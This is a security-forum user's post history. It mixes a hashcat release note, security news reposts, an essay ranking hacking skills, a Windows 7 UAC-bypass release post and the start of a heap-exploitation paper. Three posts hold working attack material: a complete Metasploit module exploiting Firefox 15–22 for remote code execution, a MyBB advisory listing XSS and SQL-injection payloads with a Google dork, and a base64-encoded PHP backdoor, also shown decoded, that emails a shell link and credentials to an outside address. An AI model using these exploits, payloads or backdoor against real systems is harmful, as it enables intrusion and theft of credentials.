Everything posted by Nytro
-
Download here: https://hashcat.net/oclhashcat/

This release is again focused on kernel performance increases and bugfixes. However, the most code-intensive change in this version was the new workload dispatcher, which is part of the oclHashcat core. The old one wasn't bad, but the new one is simply faster, which adds to the increased kernel performance. As always, make sure to unpack into a new folder; never reuse an existing oclHashcat folder (because of the cached kernels).

One important thing for AMD users: you will need to update to the latest beta version of Catalyst before updating oclHashcat. We've decided to no longer wait for AMD to ship the latest "stable" Catalyst driver, simply because the stable drivers aren't any more stable than the betas.

There's also one change to the binaries themselves. We now use our own toolchain (thanks to crosstool-ng) to build binaries against an older glibc. That was required to make the binaries compatible with Linux distributions that ship an older glibc. This means you should be able to run cudaHashcat and oclHashcat without glibc patching on Kali, some (older) Debian systems, CentOS 6.4, etc.

New algorithms:
- Skype
- Peoplesoft
- md5($salt.md5($pass))
- Mediawiki B type
- Kerberos 5 AS-REQ Pre-Auth etype 23 as fast algorithm (reimplementation)
- Android FDE
- scrypt
- Password Safe v2
- Lotus Notes/Domino 8

Skype and Peoplesoft are just new parsers, as you were already able to crack them with older oclHashcat versions by using the generic hash-types and formatting the hashes in a way oclHashcat could load. By adding parsers we simply make it more comfortable for users, who can now load the hashes in their native output format. The md5($salt.md5($pass)) generic algorithm was added because it was required for the Mediawiki B hash-type; it's a simple scheme that needs no special comment.

The Kerberos 5 algorithm is a reimplementation as a fast algorithm type. That is done when an algorithm is fast enough to require an on-GPU candidate generator. This algorithm actually was fast enough, and by not being selected as a fast hash it had lost some performance; switching it to a fast type got us some speedup for free.

Now it gets interesting. The Android FDE algorithm that was added is the one using PBKDF2-HMAC-SHA1 + CBC-ESSIV-AES with 2000 iterations. The only tricky part was the "detection" of a filesystem. Note that this algorithm is no longer used on newer Android devices; the new one uses scrypt instead of PBKDF2. For details about how the algorithm works, see here: https://hashcat.net/forum/thread-2270.html

That's why we've added scrypt on GPU. And what can I say, it's a PITA. The goal of scrypt, to run slowly on GPU, has been fulfilled. One note about that: the intention (if I understood correctly) was to make the computation slow because memory access is slow. Well, that's not what actually made it slow. It's simply the lack of total memory available on the card. Note that, to run fast with GPGPU, you have to run many tasks in parallel. That means you have to allocate a huge amount of memory for each parallel task, and that is what kills the GPU, not the access time. Also note that this scrypt variant is the real scrypt, not the minimal version used for Litecoin. The Litecoin version uses extremely low settings for N, r and p, such that it is not required to work in global memory for all operations. We're using a fully functional scrypt in which you can set N, r and p dynamically. For the benchmark, we're using the defaults of 16k, 8, 1.

The Password Safe v2 was also very interesting. This algorithm actually runs slower than the current one used in Password Safe v3, which is also supported, as hash-type 5200. On my AMD hd7970, the v2 version runs at 101 kH/s while the v3 version runs at 506.2 kH/s, but I don't think that's much of a problem; both run slowly enough and are salted.

The last algorithm added is Lotus Notes/Domino 8, which was discovered by our own philsmd. Therefore, oclHashcat v1.30 is the world's first Lotus Notes/Domino 8 (H-hashes) cracker! For details about how the algorithm works, see here: https://hashcat.net/forum/thread-3550.html

More info: https://hashcat.net/forum/thread-3627.html
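To make the memory argument concrete, here is a small sketch (using Python's hashlib.scrypt rather than hashcat's kernels) that computes one hash with the benchmark defaults N=16k, r=8, p=1 and shows the per-candidate memory cost; the password and salt are made-up values:

```python
import hashlib

# oclHashcat's benchmark defaults for scrypt: N = 16k, r = 8, p = 1.
N, r, p = 16384, 8, 1

# The scratch array V alone costs 128 * N * r bytes per candidate in flight.
mem_per_guess = 128 * N * r
print(mem_per_guess // (1024 * 1024), "MiB per candidate")  # 16 MiB

# A single derivation (password/salt are illustrative only).
dk = hashlib.scrypt(b"password", salt=b"salt", n=N, r=r, p=p,
                    maxmem=2**26, dklen=32)
print(dk.hex())
```

At 16 MiB per in-flight candidate, a card with 3 GB of global memory can keep fewer than 200 candidates resident at once, which is exactly the parallelism starvation described above.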
-
08/01/2014 08:14 PM   386,377 woot14-adrian.pdf
07/19/2014 03:47 PM 2,177,899 woot14-akhawe.pdf
07/22/2014 08:52 PM   207,942 woot14-bruno.pdf
07/10/2014 06:44 PM 1,062,161 woot14-bursztein.pdf
07/22/2014 09:43 AM 1,551,501 woot14-chalupar.pdf
07/21/2014 11:38 PM   429,102 woot14-deshotels.pdf
07/21/2014 06:36 PM 3,475,919 woot14-fiebig.pdf
07/23/2014 04:56 AM 2,804,299 woot14-ghena.pdf
07/25/2014 04:23 PM 2,093,963 woot14-grand.pdf
07/22/2014 05:23 AM   191,274 woot14-ho.pdf
07/25/2014 04:22 PM   430,803 woot14-kaplan.pdf
07/22/2014 08:53 PM   123,691 woot14-kuhrer.pdf
07/23/2014 10:52 PM   350,262 woot14-laing.pdf
07/23/2014 03:54 AM   273,914 woot14-malvoni.pdf
07/23/2014 02:41 AM   141,500 woot14-maskiewicz.pdf
07/22/2014 12:29 PM   735,065 woot14-ullrich.pdf
07/22/2014 06:50 AM   314,998 woot14-vantonder.pdf

Download: https://www.usenix.org/system/files/tech-schedule/woot14_papers_archive.zip
-
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/exploitation/jsobfu'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::BrowserExploitServer
  include Msf::Exploit::Remote::BrowserAutopwn
  include Msf::Exploit::Remote::FirefoxPrivilegeEscalation

  autopwn_info({
    :ua_name    => HttpClients::FF,
    :ua_minver  => "15.0",
    :ua_maxver  => "22.0",
    :javascript => true,
    :rank       => ExcellentRanking
  })

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Firefox toString console.time Privileged Javascript Injection',
      'Description' => %q{
        This exploit gains remote code execution on Firefox 15-22 by abusing
        two separate Javascript-related vulnerabilities to ultimately inject
        malicious Javascript code into a context running with chrome://
        privileges.
      },
      'License' => MSF_LICENSE,
      'Author'  => [
        'moz_bug_r_a4', # discovered CVE-2013-1710
        'Cody Crews',   # discovered CVE-2013-1670
        'joev'          # metasploit module
      ],
      'DisclosureDate' => "May 14 2013",
      'References'     => [
        ['CVE', '2013-1670'], # privileged access for content-level constructor
        ['CVE', '2013-1710']  # further chrome injection
      ],
      'Targets' => [
        [ 'Universal (Javascript XPCOM Shell)', {
          'Platform' => 'firefox',
          'Arch'     => ARCH_FIREFOX
        } ],
        [ 'Native Payload', {
          'Platform' => %w{ java linux osx solaris win },
          'Arch'     => ARCH_ALL
        } ]
      ],
      'DefaultTarget'       => 0,
      'BrowserRequirements' => {
        :source  => 'script',
        :ua_name => HttpClients::FF,
        :ua_ver  => lambda { |ver| ver.to_i.between?(15, 22) }
      }
    ))

    register_options([
      OptString.new('CONTENT', [ false, "Content to display inside the HTML <body>.", "" ])
    ], self.class)
  end

  def on_request_exploit(cli, request, target_info)
    send_response_html(cli, generate_html(target_info))
  end

  def generate_html(target_info)
    key  = Rex::Text.rand_text_alpha(5 + rand(12))
    opts = { key => run_payload } # defined in FirefoxPrivilegeEscalation mixin

    js = Rex::Exploitation::JSObfu.new(%Q|
      var opts = #{JSON.unparse(opts)};
      var key = opts['#{key}'];
      var y = {}, q = false;
      y.constructor.prototype.toString = function() {
        if (q) return;
        q = true;
        crypto.generateCRMFRequest(
          "CN=Me",
          "#{Rex::Text.rand_text_alpha(5 + rand(12))}",
          "#{Rex::Text.rand_text_alpha(5 + rand(12))}",
          null, key, 1024, null, "rsa-ex"
        );
        return 5;
      };
      console.time(y);
    |)
    js.obfuscate

    %Q|
      <!doctype html>
      <html>
      <body>
      <script>
      #{js}
      </script>
      #{datastore['CONTENT']}
      </body>
      </html>
    |
  end
end

Sursa: http://www.exploit-db.com/exploits/34363/
-
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org
***************************************************
a) Cross Site Scripting in Installation Wizard ( Board Configuration )
Fill -Forum Name, Website Name, Website URL- with your code, for example: "><script>alert('DemoLisH')</script>
localhost/install/index.php
Now let's finish setup and go to the homepage.

b) SQL Injection in Private Messages ( User CP )
Go to -> Inbox, for example: localhost/private.php
Search with the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

c) SQL Injection in Showthread
Go to -> Show Thread, for example: localhost/showthread.php?tid=1
Search with the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

d) SQL Injection in Search
Go to -> Search, for example: localhost/search.php
Search with the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

e) SQL Injection in Help Documents
Go to -> Help Documents, for example: localhost/misc.php?action=help
Search with the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload

f) SQL Injection in Forum Display
Go to -> Forum Display, for example: localhost/forumdisplay.php?fid=2
Search "Search this Forum" with the following keywords: <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
***************************************************
[~#~] Thanks To: Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.

Sursa: http://www.exploit-db.com/exploits/34381/
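The installation-wizard XSS above works because the submitted value is echoed back into an HTML attribute without escaping. A minimal sketch of the mitigation, with Python's html.escape standing in for PHP's htmlspecialchars:

```python
import html

payload = "\"><script>alert('DemoLisH')</script>"

# Echoed raw, the payload closes the attribute and injects a script tag:
unsafe = '<input value="%s">' % payload

# Escaped, the same input renders as inert text:
safe = '<input value="%s">' % html.escape(payload, quote=True)
print(safe)
```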
-
Network specialized in computer fraud dismantled by Romanian police with the help of FBI agents from the US
21 August 2014, 11:12, by Oana Craciun

Police officers and D.I.I.C.O.T. prosecutors from Ploiesti, with the support of the Special Operations Directorate (I.G.P.R.) and in collaboration with the Federal Bureau of Investigation office at the US Embassy in Bucharest, have dismantled an organized crime group specialized in computer fraud which allegedly defrauded several foreign citizens of over 100,000 US dollars, the Romanian Police reports.

Two days ago, on 19 August, police from Ploiesti and Bucharest carried out 8 home searches in Prahova county and Bucharest, aimed at dismantling a criminal group (of 14 people) whose members are suspected of skimming, fraudulent cash withdrawals, identity fraud, forgery and computer fraud. The searches turned up money-transfer documents, computer systems, data-storage devices, an illegally held gas pistol with 8 cartridges, a pellet pistol held in breach of ownership rules, cards issued by US banks, a forged passport and cash. "In this case, 13 people were brought, under escort warrants, to the prosecutor's office for further investigation," the Romanian Police statement says.

The investigation showed that the members of the group, coordinated by a 38-year-old man from Ploiesti, allegedly posted fictitious ads on specialized websites offering cars for sale and demanded part of the price from the victims as a deposit. Other members of the group allegedly travelled to the US to open bank accounts using forged identity documents; the victims transferred money into these accounts as the "deposit" for the cars they wanted to buy. From these accounts the money was withdrawn and transferred back to Romania through rapid money-transfer companies, in the names of several people recruited for that purpose. It was also established that another member of the network allegedly possessed skimming equipment, which he used in 2012 on US territory to obtain bank card data. So far, 14 victims have been identified, all US citizens, with total losses of over 100,000 US dollars.

Seven people held for 24 hours
Following the hearings, seven people were detained for 24 hours. Yesterday, 20 August, they were placed under judicial control. The investigation continues into the offences of forming and joining an organized criminal group, computer fraud, computer forgery, possession of instruments for counterfeiting, identity fraud and violation of the weapons and ammunition regime. "In this case, we cooperated with representatives of the Federal Bureau of Investigation at the US Embassy in Bucharest. The FBI carried out several searches in the US, during which it discovered forged identity documents (passports and driving licences in the names of people from the Czech Republic, Slovenia and France) used to open accounts and make bank transfers," the police added. The operation was supported by the Special Operations Directorate (I.G.P.R.) and the Romanian Intelligence Service; gendarmes also took part.

Sursa: adevarul.ro
-
Just a curiosity of mine. I found a few interesting Tor nodes (the list is public): TorStatus - Tor Network Status (+ Atlas and Globe):
- kasperskytor01 ( Tor Network Status -- Router Detail )
- kasperskytor02 ( Tor Network Status -- Router Detail )
Contact details: Kaspersky TOR Abuse <torabuse AT kaspersky dot ro>
What I find interesting is that both have this ExitPolicy:
accept *:53
accept *:80
accept *:8080
accept *:3128
accept *:21
reject *
What does that tell you? That it is an exit node for those ports. What's odd about it? All of those ports carry PLAIN TEXT protocols: DNS, HTTP, HTTP proxy, FTP. So what exactly is the idea behind these nodes?
Edit: Would you look at that, Kaspersky contributes enormously to the Tor network: "Kaspersky Lab had uncovered evidence of 900 services using Tor, said researcher Sergey Lozhkin, through its 5,500 plus nodes (server relays) and 1,000 exit nodes (servers from which traffic emerges)." Via: http://news.techworld.com/security/3505255/tor-network-used-to-hide-900-botnets-and-darknet-markets-says-kaspersky-lab/
OK, the point I'm making is this: the exit node sees everything you send over those plaintext ports, so Tor without HTTPS is no privacy at all.
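Tor exit policies are evaluated first-match-wins. A small sketch (simplified: real policies can also contain IP ranges and port ranges) shows what the policy above lets out:

```python
# Minimal first-match-wins evaluation of the exit policy quoted above.
POLICY = [
    "accept *:53", "accept *:80", "accept *:8080",
    "accept *:3128", "accept *:21", "reject *",
]

def exits_to(port):
    for rule in POLICY:
        verb, _, target = rule.partition(" ")
        host, _, ports = target.partition(":")  # "*:80" -> ("*", "80"); "*" -> ("*", "")
        if ports in ("", "*") or int(ports) == port:
            return verb == "accept"
    return False

print(exits_to(80))   # True  -- plaintext HTTP is allowed out
print(exits_to(443))  # False -- HTTPS is not
```

Note that 443 is conspicuously absent from the accept list, which is the oddity the post is pointing at.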
-
Researchers find it’s terrifyingly easy to hack traffic lights Open wireless and default passwords make controlling a city's intersections trivial. by Lee Hutchinson - Aug 20 2014, 9:39pm GTBST A typical intersection configuration. Taking over a city’s intersections and making all the lights green to cause chaos is a pretty bog-standard Evil Techno Bad Guy tactic on TV and in movies, but according to a research team at the University of Michigan, doing it in real life is within the realm of anyone with a laptop and the right kind of radio. In a paper published this month, the researchers describe how they very simply and very quickly seized control of an entire system of almost 100 intersections in an unnamed Michigan city from a single ingress point. Nodes in the traffic light network are connected in a tree-topology IP network, all on the same subnet. The exercise was conducted on actual stoplights deployed at live intersections, "with cooperation from a road agency located in Michigan." As is typical in large urban areas, the traffic lights in the subject city are networked in a tree-type topology, allowing them to pass information to and receive instruction from a central management point. The network is IP-based, with all the nodes (intersections and management computers) on a single subnet. In order to save on installation costs and increase flexibility, the traffic light system uses wireless radios rather than dedicated physical networking links for its communication infrastructure—and that’s the hole the research team exploited. Wireless security? What's that? The systems in question use a combination of 5.8GHz and 900MHz radios, depending on the conditions at each intersection (two intersections with a good line-of-sight to each other use 5.8GHz because of the higher data rate, for example, while two intersections separated by obstructions would use 900MHz). 
The 900MHz links use "a proprietary protocol with frequency hopping spread-spectrum (FHSS)," but the 5.8GHz version of the proprietary protocol isn’t terribly different from 802.11n. In fact, using unmodified laptops and smartphones, the team was able to see each intersection’s broadcast SSID, though they were unable to join the networks due to the protocol differences. The paper notes that researchers could have reverse-engineered the protocol to connect but instead chose to simply use the same type of custom radio for the project as the intersections use. Lest you think that’s cheating, the paper explains the decision like this: We chose to circumvent this issue and use the same model radio that was deployed in the studied network for our attack. While these radios are not usually sold to the public, previous work has shown social engineering to be effective in obtaining radio hardware [38].... Once the network is accessed at a single point, the attacker can send commands to any intersection on the network. This means an adversary need only attack the weakest link in the system. The 5.8GHz network has no password and uses no encryption; with a proper radio in hand, joining is trivial. Smash box After gaining access, the next step was to be able to communicate with the controllers that operate each intersection. This was made easy by the fact that in this system, the control boxes run VxWorks 5.5, a version which by default gets built from source with a debug port left accessible for testing. The research team quickly discovered that the debug port was open on the live controllers and could directly "read and write arbitrary memory locations, kill tasks, and even reboot the device." Debug access to the system also let the researchers look at how the controller communicates to its attached devices—the traffic lights and intersection cameras. 
They quickly discovered that the control system’s communication was totally non-obfuscated and easy to understand—and easy to subvert: By sniffing packets sent between the controller and this program, we discovered that communication to the controller is not encrypted, requires no authentication, and is replayable. Using this information, we were then able to reverse engineer parts of the communication structure. Various command packets only differ in the last byte, allowing an attacker to easily determine remaining commands once one has been discovered. We created a program that allows a user to activate any button on the controller and then displays the results to the user. We also created a library of commands which enable scriptable attacks. We tested this code in the field and were able to access the controller remotely. Once total access to a controller and its commands was gained, that was it—at that point, the team had full control over every intersection in the entire network. They could change lights at will and even control each intersection’s cameras. The paper lays out several potential activities that an attacker could engage in, including connecting from a moving vehicle and making all lights along the attacker’s path green, or purposefully snarling traffic to aid in the attacker’s escape after a crime. More worrying is the ability of an attacker to engage in a type of denial-of-service attack on controlled intersections by triggering each intersection’s malfunction management unit, which would put the lights into a failure mode—like all directions blinking red—until physically reset. This would, according to the paper, let "an adversary… disable traffic lights faster than technicians can be sent to repair them." Mitigation The paper closes by pointing out a number of ways in which the gaping security holes could be easily closed.
Chief among the recommendations is some kind of wireless security; the paper points out that the 5.8GHz systems support WPA2 encryption, and enabling it is trivial. The 900MHz systems are more secure by virtue of not using a frequency band easily accessible by consumer laptops and smartphones, but they also support the older WEP and WPA wireless encryption standards. But a layered defense is best, and as such the paper also recommends stricter controls over the traffic systems’ IP networks—firewalling devices and strictly controlling the type of network traffic allowed. Further, though many of the components in the network support some kind of username and password authentication scheme, the report ominously points out that "all of the devices in the deployment we studied used the default credentials that came built into the device." Doing some basic housekeeping and changing the credentials on the VxWorks intersection controllers and the wireless network components would go a long way toward frustrating attacks. Should we panic? It’s hard to not get a little antsy when confronted with research showing that vital pieces of public infrastructure are sitting essentially unsecured. The paper’s conclusion is clearly stated: "While traffic control systems may be built to fail into a safe state, we have shown that they are not safe from attacks by a determined adversary." There is plenty of blame to be cast, from the local agencies deploying infrastructure hardware in an unsafe state to the manufacturers helping them set things up. In fact, the most upsetting passage in the entire paper is the dismissive response issued by the traffic controller vendor when the research team presented its findings. According to the paper, the vendor responsible stated that it "has followed the accepted industry standard and it is that standard which does not include security." Sursa: Researchers find it’s terrifyingly easy to hack traffic lights | Ars Technica
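The paper's observation that command packets differ only in their final byte is easy to picture. In this sketch the header bytes are invented, since the real proprietary protocol is not public:

```python
# Hypothetical packet layout: a fixed header plus a one-byte command code.
# The header value here is made up purely for illustration.
PREFIX = bytes.fromhex("aa5501")

def build_command(cmd_byte):
    # Per the paper, command packets differ only in the last byte.
    return PREFIX + bytes([cmd_byte])

# Once one valid packet has been sniffed, the whole command space is enumerable:
candidates = [build_command(b) for b in range(256)]
print(len(candidates), "candidate command packets")
```

This is why replayable, unauthenticated framing is so dangerous: a single captured packet leaks the structure of every other command.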
-
Get to work, you slobs! Topic closed.
-
Very likely FAKE. Two reasons: 1. A lot of people play 2048. 2. An awful lot of people believe money falls from the sky (shame on you).
-
Backdoor:

<?php eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsNCmlmKCFlcmVnKCRzaXRlLCAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSkpDQp7DQokdG8gPSAic2F0dGlhMzRAZ21haWwuY29tIjsNCiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7DQokaGVhZGVyID0gImZyb206IE5ldyBTaGVsbCA8c2FoYTIxQGRldi1wdHMuY29tPiI7DQokbWVzc2FnZSA9ICJMaW5rIDogaHR0cDovLyIgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXSAuICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIC4gIlxyXG4iOw0KJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187DQokbWVzc2FnZSAuPSAiIFVzZXIgOiAiIC4gJHVzZXI7DQokbWVzc2FnZSAuPSAiIFBhc3MgOiAiIC4gJHBhc3M7DQokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7DQplY2hvICIiOw0KZXhpdDsNCn0=')); ?>

Decoded, that is:

$site = "www.dev-pts.com/vb";
if (!ereg($site, $_SERVER['SERVER_NAME']))
{
    $to = "sattia34@gmail.com";
    $subject = "New Shell Uploaded";
    $header = "from: New Shell <saha21@dev-pts.com>";
    $message  = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
    $message .= "Path : " . __file__;
    $message .= " User : " . $user;
    $message .= " Pass : " . $pass;
    $sentmail = @mail($to, $subject, $message, $header);
    echo "";
    exit;
}
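The safe way to see what an eval(base64_decode('...')) blob does is to decode it offline rather than let eval() run it. A short sketch, with a harmless stand-in payload:

```python
import base64

# A stand-in payload, encoded the same way the backdoor's blob is.
blob = base64.b64encode(b'mail("attacker@example.com", "New Shell", $msg);')

# Decode and *read* it; never eval/exec a decoded blob.
decoded = base64.b64decode(blob).decode("utf-8", errors="replace")
print(decoded)
```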
-
In other words, you're only good at running your mouth.
-
Cryptography Expert — PGP Encryption is Fundamentally Broken, Time for PGP to Die
Tuesday, August 19, 2014, by Wang Wei

A senior cryptography expert has claimed there are multiple fundamental issues in PGP, an open-source end-to-end encryption standard for securing email. PGP, or Pretty Good Privacy, a program written in 1991, combines public-key cryptography, symmetric encryption and hashing to provide privacy and security as well as authenticity: privacy and security let users exchange messages confidentially, while authenticity proves the origin of those messages. But PGP is a complicated multi-step process which requires users to keep track of other users' public keys in order to communicate. Despite the clumsiness of the PGP implementation, Internet giants such as Google and Yahoo! have been looking to integrate it into their popular email services. The complexity of PGP not only makes it hard to implement and use, it makes it insecure as well. Matthew Green, a respected research professor who lectures in computer science and cryptography at Johns Hopkins University in Maryland, argues that it's "time for PGP to die", describing the software as "downright unpleasant".

KEY USABILITY ISSUES
The researcher says the problem lies in the nature of PGP public keys themselves: they are large and contain lots of extraneous information, so it is really difficult either to print the keys on a business card or to compare them manually. "You can write this off to a quirk of older technology, but even modern elliptic curve implementations still produce surprisingly large keys," Green wrote in his personal blog post. "Since PGP keys aren't designed for humans, you need to move them electronically. But of course humans still need to verify the authenticity of received keys, as accepting an attacker-provided public key can be catastrophic."

"PGP addresses this with a hodgepodge of key servers and public key fingerprints. These components respectively provide (untrustworthy) data transfer and a short token that human beings can manually verify. While in theory this is sound, in practice it adds complexity, which is always the enemy of security."

KEY MANAGEMENT ISSUES
According to the researcher, PGP key management "sucks." As Green says, "Transparent (or at least translucent) key management is the hallmark of every successful end-to-end secure encryption system." He also points to "the need to trust a central authority to distribute keys"; since Google, Yahoo and other major email providers will soon offer PGP encryption to their users, they will, in other words, become the central authorities distributing keys among their users. One possible consequence is that users could be tricked into accepting a false replacement key from a key server, or otherwise confuse their key management to the point of corrupting a communication path that used to be safe, letting a man in the middle into the game. And should these central authorities be ordered by law enforcement agencies or a government to do exactly that, your game is over.

SECRECY ISSUES
Green also complains that there is no forward secrecy, meaning that if a private key is obtained by an intruder, it can be used to decrypt all previously encrypted files and personal messages. A further criticism is of "terrible mail client implementations": "Many PGP-enabled mail clients make it ridiculously easy to send confidential messages with encryption turned off, to send unimportant messages with encryption turned on, to accidentally send to the wrong person's key (or the wrong subkey within a given person's key)," he wrote. "They demand you encrypt your key with a passphrase, but routinely bug you to enter that passphrase in order to sign outgoing mail -- exposing your decryption keys in memory even when you're not reading secure email."

It's surprising that, although we have come a long way since the 1990s, the usability of PGP has improved only a little. Back then the Federal Government was so alarmed by people communicating securely using PGP email encryption that it opened a criminal investigation of Phil Zimmermann, who released PGP in 1991. At the beginning of the month, Yahoo! announced support for end-to-end encryption using a fork of Google's secure end-to-end email extension; the outcome is that both Gmail and Yahoo! Mail are moving toward supporting PGP for encrypting mail. "As transparent and user-friendly as the new email extensions are, they're fundamentally just reimplementations of OpenPGP - and non-legacy-compatible ones, too," Green states.

According to Green, the solution is to stop plugging encryption software into today's plaintext email systems and instead build networks designed from the ground up to protect messages from eavesdroppers. He suggests TextSecure and DarkMail as potentially interesting projects moving in this direction.

Sursa: Cryptography Expert — PGP Encryption is Fundamentally Broken, Time for PGP to Die
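Green's fingerprint complaint is about condensing a large key into a short token a human can compare. A sketch of the idea (the key bytes are random stand-ins; real OpenPGP v4 fingerprints are SHA-1 over a formatted key packet, not the raw key bytes):

```python
import hashlib
import os

# Stand-in for a large public key blob (~270 bytes of RSA-2048 key material).
public_key = os.urandom(270)

# Condense it into a 160-bit fingerprint a human can (laboriously) compare.
fingerprint = hashlib.sha1(public_key).hexdigest().upper()
groups = " ".join(fingerprint[i:i + 4] for i in range(0, 40, 4))
print(groups)
```

Even this shortened form is ten groups of four hex digits, which is exactly the manual-comparison burden Green calls out.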
-
It may seem odd, but I made this list because this is how I think things evolve. I took things in small steps: from using programs to do various crap, to learning simple languages like HTML, moving up to server-side languages (PHP) and communication with databases (MySQL). Only after learning these things can someone understand what XSS and SQLi are, yet there are plenty of people who read two cheap tutorials and consider that they "know" these notions.

I then included two languages (among the more commonly used) for desktop application programming. I consider their level, and the knowledge required, higher than for a server-side language; the main difference is that server-side languages are scripting (interpreted) languages, while desktop ones are (compiled) programming languages. In general.

Then we move on to networking, starting with HTTP, a notion everyone should know, and then to more advanced things: TCP/IP at the protocol level, meaning the TCP header and IP header, the 3-4 step establishment (SYN...) of a TCP connection, and so on. Rather few people take an interest in such notions, which can get complicated, and that is why I placed them so far down.

On to operating systems. Although Windows isn't necessarily as simple as it looks, the move from Windows to Linux is fairly difficult because they are simply different. There are, however, two kinds of people: the Ubuntu crowd (most of them being like "the Windows crowd"), i.e. people who can't run 2-3 commands in a terminal beyond a sudo apt-get install; and the other category, who can install a program from source, configure a server and stop some services. Then there are the people who can write a bash script, use grep, sed, or write an awk script.

I deliberately placed "Penetration testing" after all of these notions because I consider that a penetration tester must know ALL of them. I say this because I see many losers who consider themselves pentesters because they put a <script>alert(1)</script> into a search textbox and go "Wow, I found an XSS!". No. I work as a penetration tester, and it means knowing "a lot of everything".

Beyond this level there is, in my opinion, the "low-level" tier. This is where those with Assembler knowledge arrive, going further into the internals of operating systems (i.e. the kernel); those who do reverse engineering (on malware, even cracks); and the most advanced level anyone can reach is, I believe, "exploit development". So those who find and exploit a use-after-free in Internet Explorer, a type confusion in Adobe Reader, etc. stand on the most respectable level.

IT Security level:
0. I want to crack passwords (generically speaking)
1. Using a Trojan/keylogger (what attracts beginners: "hacks")
2. Using a scanner (feeling targeted?) Put differently: using various tools (click, click, shit)
3. HTML (a table, an iframe, some linked images...)
4. HTML + Javascript (at least elementary Javascript)
5. XSS (because there are people who [think they] "know" it even without knowing PHP)
6. SQL Injection (as above: people who don't know what that "union" does but brag they "know" SQLi)
7. PHP (ASP, JSP: knowing the language)
8. MySQL (Oracle, MSSQL: at least SELECT/UPDATE/INSERT/DELETE)
9. Linux (Ubuntu or another "GUI only")
10. C# & .NET (various classes)
11. C/C++ (pointers, classes)
12. HTTP (request/response)
13. Networking (TCP/IP)
14. Linux (RedHat/CentOS: configuration, installing from source)
15. Shell scripting (grep, sed, awk)
16. Penetration testing (everything above: web security, Linux, networking, programming)
17. ASM (mov, push, pop, the basics)
18. OS internals (memory management, processes, PE/ELF formats)
19. Reverse engineering (debugging)
20. Exploit development (writing shellcodes, finding and exploiting buffer overflows, use-after-free...)

I made this list so we can all see, in broad strokes, what it means to be a "security researcher" (generically speaking), and so everyone can see where they have got to and where they could go. I'm aware that some things are unrelated to each other (ASM and SQLi), but I consider the knowledge required for ASM far more advanced than for SQL injection. Don't get me wrong, I don't underestimate any level, and I don't think anyone has to know all the listed notions perfectly, because no one can. I'm 100% sure there is no one here who knows ALL the tags and attributes in HTML, and the same goes for everything else. Of course, the list is far from complete, but it gives an overall idea. If you disagree or have ideas for improvement, I await comments. Mainly I expect from everyone a post with a number. That's all. In fact, you don't even need to post; just think about your knowledge relative to the whole body of knowledge someone can have. I'll start: I'm around levels 18-19, wrestling with them, but there's a long way to go before I master them.
-
Program, Source Code and Step-by-Step Guide

While Windows 7 was still in beta, Microsoft said this was a non-issue and ignored my offers to give them full details for several months, so there can't be an issue with making everything public now.

Win7ElevateV2.zip (32-bit and 64-bit binaries; use the version for your OS.)
Win7ElevateV2_Source.zip (C++ source code, and detailed guide to how it works.)
Source in HTML format (for browsing online)
Step-by-step guide (description of what the code does)

This works against the RTM (retail) and RC1 versions of Windows 7. It probably won't work with the old beta build 7000 due to changes in which apps can auto-elevate. Microsoft could block the binaries via Windows Defender (update: they now do via MSE), or plug the CRYPTBASE.DLL hole, but unless they fix the underlying code-injection / COM-elevation problem, the file copy stuff will still work. Fixing only the CRYPTBASE.DLL part, or blocking a particular EXE or DLL, just means someone has to find a slightly different way to take advantage of the file copy part. Finding the CRYPTBASE.DLL method took about 10 minutes, so I'd be surprised if finding an alternative took long. Even if the hole is fixed, UAC in Windows 7 will remain unfair to third-party code and inflexible for users who wish to use third-party admin tools.

Source: Windows 7 UAC whitelist: Code-injection Issue (and more)
-
Exploiting The Wilderness

by Phantasmal Phantasmagoria
phantasmal@hush.ai

- ---- Table of Contents -------------

1 - Introduction
  1.1 Prelude
  1.2 The wilderness
2 - Exploiting the wilderness
  2.1 Exploiting the wilderness with malloc()
  2.2 Exploiting the wilderness with an off-by-one
3 - The wilderness and free()
4 - A word on glibc 2.3
5 - Final thoughts

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------

- ---- Introduction ------------------

- ---- Prelude

This paper outlines a method of exploiting heap overflows on dlmalloc based glibc 2.2 systems. In situations where an overflowable buffer is contiguous to the wilderness it is possible to achieve the aa4bmo primitive [1]. This article is written with an x86/Linux target in mind. It is assumed the reader is familiar with the dlmalloc chunk format and the traditional methods of exploiting dlmalloc based overflows [2][3]. It may be desired to obtain a copy of the complete dlmalloc source code from glibc itself, as excerpts are simplified and may lose a degree of context.

- ---- The wilderness

The wilderness is the top-most chunk in allocated memory. It is similar to any normal malloc chunk - it has a chunk header followed by a variably long data section. The important difference lies in the fact that the wilderness, also called the top chunk, borders the end of available memory and is the only chunk that can be extended or shortened. This means it must be treated specially to ensure it always exists; it must be preserved.
